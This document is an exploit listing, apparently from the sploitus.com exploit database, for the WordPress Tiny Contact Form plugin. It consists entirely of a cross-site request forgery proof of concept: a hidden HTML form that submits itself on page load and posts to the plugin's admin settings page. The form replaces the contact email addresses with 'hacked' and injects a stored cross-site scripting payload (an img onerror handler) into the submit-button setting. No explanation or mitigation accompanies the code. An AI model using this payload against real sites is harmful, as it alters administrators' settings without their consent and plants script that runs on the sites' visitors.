Share
## https://sploitus.com/exploit?id=WPEX-ID:5FA5838E-4843-4D9C-9884-E3EBBF56FC6A
<form id="test" action="https://example.com/wp-admin/options-general.php?page=tiny-contact-form" method="POST">
    <input type="text" name="tcf_to_email" value="hacked">
    <input type="text" name="tcf_from_email" value="hacked">
    <input type="text" name="tcf_msg_ok" value="">
    <input type="text" name="tcf_msg_err" value="">
    <input type="text" name="tcf_submit" value=''"><img src=x onerror=alert(1)>''>
    <input type="text" name="tcf_subpre" value="">
    <input type="text" name="tcf_field_1" value="">
    <input type="text" name="tcf_field_2" value="">
    <input type="text" name="tcf_field_3" value="">
    <input type="text" name="tcf_field_4" value="">
    <input type="text" name="tcf_field_5" value="">
    <input type="text" name="tcf_captcha_label" value="">
    <input type="text" name="tcf_captcha2_question" value="">
    <input type="text" name="tcf_captcha2_answer" value="">
    <input type="text" name="tcf_css" value="">
    <input type="text" name="tcf_save" value="Änderungen speichern">
</form>
<script>
    document.getElementById("test").submit();
</script>